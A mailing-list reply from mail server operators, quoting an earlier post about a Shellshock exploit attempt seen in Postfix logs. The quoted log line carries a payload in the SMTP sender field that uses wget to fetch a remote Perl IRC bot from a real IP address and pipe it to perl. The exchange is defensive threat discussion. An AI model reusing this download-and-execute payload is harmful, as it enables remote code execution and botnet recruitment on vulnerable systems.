I received one of these bad girls to my Nightmare Mail (fork of notqmail),
albeit with a different argument to the attempted wget command (which was never
processed, though my mailserver was able to successfully make delivery of this
technically non-compliant message). It seems to my friends to be an attempt to
exploit Shellshock.
On 14 January 2023 14:16:05 UTC, Mary via mailop <[email protected]> wrote:
>
>Within the past several days, I've been monitoring a kind of exploit that
>affects the 'from' RCPT part of the smtp conversation:
>
>```
>postfix/postscreen[633104]: PREGREET 8 after 0.09 from [159.89.232.70]:52350:
>HELO x\r\n
>postfix/postscreen[633104]: NOQUEUE: reject: RCPT from [159.89.232.70]:52350:
>550 5.5.1 Protocol error; from=<() { :; }; wget -qO -
>193.56.28.202/botF|perl>, to=<root>, proto=SMTP, helo=<x>
>postfix/postscreen[633104]: DATA without valid RCPT from [159.89.232.70]:52350
>```
>
>Does anyone know what kind of software is the target of this attack?
>
>Obviously, its not postfix, which quickly drops the connection. Could it be
>some kind of software that parses logs?
>
>I'd appreciate your thoughts.
>
>PS:
>the payload is a perl IRC bot
>_______________________________________________
>mailop mailing list
>[email protected]
>https://list.mailop.org/listinfo/mailop
--
Sent from my Android device with K-9 Mail. Please excuse my brevity._______________________________________________
mailop mailing list
[email protected]
https://list.mailop.org/listinfo/mailop
